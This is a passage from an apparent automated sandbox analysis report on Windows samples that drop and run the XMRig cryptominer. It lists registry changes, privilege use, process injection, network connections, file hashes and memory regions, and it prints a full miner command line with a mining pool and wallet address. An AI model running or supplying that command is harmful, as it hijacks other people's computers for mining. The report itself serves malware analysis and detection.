(5).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1248 wrote to memory of 1996 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1248 wrote to memory of 1996 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.10.44.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1996-16-0x000001F8810B0000-0x000001F8810D0000-memory.dmp
memory/1996-17-0x000001F881100000-0x000001F881120000-memory.dmp
memory/1996-18-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-20-0x000001F881120000-0x000001F881140000-memory.dmp
memory/1996-19-0x000001F881150000-0x000001F881170000-memory.dmp
memory/1996-21-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-22-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-25-0x000001F881120000-0x000001F881140000-memory.dmp
memory/1996-24-0x000001F881150000-0x000001F881170000-memory.dmp
memory/1996-23-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-26-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-27-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-28-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-29-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-30-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-31-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-32-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-33-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-34-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-35-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-36-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-37-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-38-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-39-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-40-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-41-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-42-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-43-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-44-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-45-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-46-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-47-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-48-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-49-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-50-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-51-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-52-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-53-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-54-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-55-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-56-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-57-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-58-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-59-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-60-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-61-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-62-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-63-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-64-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-65-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-66-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-67-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-68-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-69-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-70-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-71-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-72-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-73-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-74-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-75-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-76-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-77-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-78-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-79-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-80-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-81-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-82-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-83-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
memory/1996-84-0x00007FF7648A0000-0x00007FF7653A3000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 20:03
Platform
win10v2004-20240426-en
Max time kernel
1797s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 60 wrote to memory of 5052 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 60 wrote to memory of 5052 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.80.50.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/5052-16-0x0000017BF20F0000-0x0000017BF2110000-memory.dmp
memory/5052-17-0x0000017BF38F0000-0x0000017BF3910000-memory.dmp
memory/5052-18-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-19-0x0000017BF3910000-0x0000017BF3930000-memory.dmp
memory/5052-20-0x0000017BF3930000-0x0000017BF3950000-memory.dmp
memory/5052-21-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-22-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-25-0x0000017BF3930000-0x0000017BF3950000-memory.dmp
memory/5052-24-0x0000017BF3910000-0x0000017BF3930000-memory.dmp
memory/5052-23-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-26-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-27-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-28-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-29-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-30-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-31-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-32-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-33-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-34-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-35-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-36-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-37-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-38-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-39-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-40-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-41-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-42-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-43-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-44-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-45-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-46-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-47-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-48-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-49-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-50-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-51-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-52-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-53-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-54-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-55-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-56-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-57-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-58-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-59-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-60-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-61-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-62-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
